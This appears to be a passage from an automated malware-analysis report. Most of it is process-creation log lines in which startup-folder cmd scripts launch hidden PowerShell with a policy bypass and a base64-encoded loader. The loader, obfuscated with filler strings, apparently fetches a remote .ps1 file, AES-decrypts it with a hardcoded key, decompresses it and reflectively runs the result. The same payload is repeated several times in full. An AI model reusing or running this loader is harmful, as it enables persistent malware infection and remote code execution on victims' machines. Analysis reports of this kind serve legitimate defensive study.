CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_7b316f35.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0b65a00e.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6c687774.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_03a3688f.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_95d3f0d3.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtM